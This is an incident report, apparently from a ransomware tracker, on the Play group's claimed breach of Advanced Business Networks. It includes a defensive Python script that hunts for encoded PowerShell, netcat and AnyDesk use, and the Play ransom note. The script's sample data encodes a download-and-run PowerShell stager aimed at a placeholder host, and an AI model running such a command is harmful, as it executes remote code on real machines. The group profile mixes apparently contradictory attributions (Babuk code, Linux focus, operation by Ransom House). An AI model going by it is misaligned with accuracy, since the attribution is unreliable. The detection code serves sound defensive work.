The Tactics of Play Ransomware Group: A Threat to IT Security

Incident Date: April 30, 2024


Overview

Title: The Tactics of Play Ransomware Group: A Threat to IT Security
Victim: Advanced Business Networks, Inc
Attacker: Play
Location: Mundelein, USA / Illinois, USA
First Reported: April 30, 2024

Ransomware Attack on Advanced Business Networks by Play Group

Company Profile

Advanced Business Networks (ABN), based in Illinois, USA, is a prominent IT consulting firm specializing in providing comprehensive IT services to small and mid-sized organizations across the Chicago area. With a team of 10 consultants, engineers, and technicians, ABN boasts over 100 combined years of IT experience. The company is known for its strategic partnerships with major IT corporations such as Microsoft, Intel, and Hewlett Packard, which provide them with early access to new products and advanced technical support.

ABN's services range from concept development through implementation to ongoing management and support, with a strong emphasis on security and managed services designed to protect and manage IT infrastructures.

Details of the Ransomware Attack

The ransomware group known as Play, which is linked to the Babuk code and primarily targets Linux systems, has claimed responsibility for the attack on ABN. The attack resulted in the compromise of various sensitive data types including client documents, payroll records, accounting data, and personal employee information.

Operational Tactics of Play Ransomware Group

Play ransomware, operated by Ransom House, has evolved from merely stealing data to using cryptographic lockers specifically designed for Linux systems. The group is known for its sophisticated approach to encrypting victim data and demanding ransom. They typically leave a ransom note titled "How To Restore Your Files.txt" with detailed instructions for victims on how to proceed.

The group's tooling includes AnyDesk, NetCat, and encoded PowerShell Empire scripts. Samples of these tools are frequently submitted to VirusTotal, which is consistent with their use for initial access and persistence.
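The three artifacts named above (encoded PowerShell launches, netcat/AnyDesk binaries, and the "How To Restore Your Files.txt" ransom note) are all visible in ordinary endpoint telemetry. The script below is an added example written for this report, not code from the RRA site or from any vendor; it runs over a small set of constructed process and file events in an assumed dict-per-event format, decodes any -EncodedCommand payload (base64 of UTF-16LE, as PowerShell expects it), and grades what it finds. The stager-like substrings it looks for in decoded scripts are heuristics chosen for the example, not a published signature, and AnyDesk is flagged only for review because an IT services firm is likely to use it legitimately.

```python
"""Hunt for Play-style artifacts in endpoint telemetry: encoded PowerShell,
remote-access/netcat binaries, and the ransom note filename from the report.
Example code written for this write-up; event format and heuristics are assumed."""
import base64
import re
from typing import Dict, Iterable, List, Optional

# Ransom note name taken from the report; compared case-insensitively.
RANSOM_NOTE_NAME = "how to restore your files.txt"
# Binaries named in the report (assumed on-disk file names).
REMOTE_TOOLS = {"anydesk.exe", "nc.exe", "ncat.exe", "netcat.exe"}
# Heuristic markers commonly seen in decoded Empire-style stagers (assumed, not a vendor signature).
SUSPICIOUS_PS = re.compile(
    r"(invoke-expression|\biex\b|downloadstring|frombase64string|new-object\s+net\.webclient)", re.I)
# Matches -e/-ec/-en/-enc/-EncodedCommand followed by a base64 blob.
ENC_FLAG = re.compile(r"(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded -EncodedCommand script, or None if absent or undecodable."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def _basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def analyze_events(events: Iterable[Dict]) -> List[Dict]:
    """Grade each event; returns findings in event order."""
    findings = []
    for ev in events:
        host = ev.get("host", "?")
        if ev.get("type") == "process":
            image = _basename(ev.get("image", ""))
            if image in REMOTE_TOOLS:
                # Legitimate in many MSP environments, so 'review' rather than 'block'.
                findings.append({"host": host, "severity": "medium",
                                 "rule": "remote-access-or-netcat-binary", "detail": image})
            decoded = decode_encoded_command(ev.get("cmdline", ""))
            if decoded is not None:
                sev = "high" if SUSPICIOUS_PS.search(decoded) else "low"
                findings.append({"host": host, "severity": sev,
                                 "rule": "encoded-powershell", "detail": decoded[:80]})
        elif ev.get("type") == "file":
            if _basename(ev.get("path", "")) == RANSOM_NOTE_NAME:
                findings.append({"host": host, "severity": "critical",
                                 "rule": "play-ransom-note", "detail": ev.get("path")})
    return findings


def _encode_ps(script: str) -> str:
    """Encode a script the way PowerShell's -EncodedCommand expects (UTF-16LE, base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample telemetry for this example; not real logs from the ABN incident.
SAMPLE_EVENTS = [
    {"type": "process", "host": "ws01",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc "
                + _encode_ps("IEX (New-Object Net.WebClient).DownloadString('http://stager.example.invalid/a')")},
    {"type": "process", "host": "ws01", "image": r"C:\Users\jdoe\AppData\Local\Temp\nc.exe", "cmdline": "nc.exe"},
    {"type": "process", "host": "ws02", "image": r"C:\Program Files (x86)\AnyDesk\AnyDesk.exe", "cmdline": "AnyDesk.exe"},
    {"type": "process", "host": "ws03", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -EncodedCommand " + _encode_ps("Get-Date")},
    {"type": "file", "host": "fs02", "path": r"D:\Shares\Finance\How To Restore Your Files.txt"},
    {"type": "file", "host": "fs02", "path": r"D:\Shares\Finance\Q1-report.docx"},
]

if __name__ == "__main__":
    for f in analyze_events(SAMPLE_EVENTS):
        print(f"{f['severity']:8} {f['host']:5} {f['rule']:32} {f['detail']}")
```

Run as-is it prints five findings: a high-severity encoded PowerShell launch, two medium-severity tool executions, a low-severity (benign) encoded command, and the ransom note creation as critical; the benign .docx event produces nothing. Feeding it real telemetry means mapping your EDR's process-creation and file-creation records onto the `type`/`host`/`image`/`cmdline`/`path` keys used here.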

Potential Vulnerabilities and Entry Points

Given ABN's use of a wide range of IT platforms and its significant online presence, it is plausible that Play exploited vulnerabilities in those systems or used phishing to gain initial access. The specific vector used in this attack, however, has not been disclosed.

Sources

Recent Ransomware Attacks

The Recent Ransomware Attacks (RRA) site acts as a watchtower, providing you with near real-time ransomware tracking of attacks, groups and their victims. Given threat actors’ overarching, lucrative success so far, ransomware attacks have become the most ubiquitous, and financially and informationally impactful cyber threat to businesses and organizations today.

The site’s data is generated based on hosting choices of real-world threat actors, and a handful of other trackers. While sanitization efforts have been taken, we cannot guarantee 100% accuracy of the data. Attack updates will be made as source data is reported by reputable sources. By viewing, accessing, or using RRA you acknowledge you are doing so at your own risk.